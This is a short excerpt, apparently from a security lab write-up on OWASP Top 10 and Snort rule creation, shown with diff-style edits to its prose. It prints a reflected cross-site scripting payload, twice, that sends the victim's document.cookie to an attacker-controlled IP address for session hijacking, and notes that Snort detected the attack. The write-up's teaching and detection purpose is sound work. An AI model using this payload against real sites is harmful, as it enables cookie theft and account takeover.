OWASP Top 10 and Snort Rule Creation

 <script>window.location=’http://172[.]16[.]0[0]102:8080/?cookie=’ + document.cookie</script>

-The output received on the remote server can be seen below.
+The output from the remote server is shown below.
 In this scenario, the attacker has the victim’s cookie and can use it to hijack their session.

-While performing this injection, Snort was also running and was able to pick up the XSS reflection attack.
+While performing this injection, Snort was also running and detected the XSS reflection attack.

 <SCRIPT><SCRIPTwindow.location=’http://172[.]16[.]0[0]102:8080/?cookie=’ + document.cookie</script>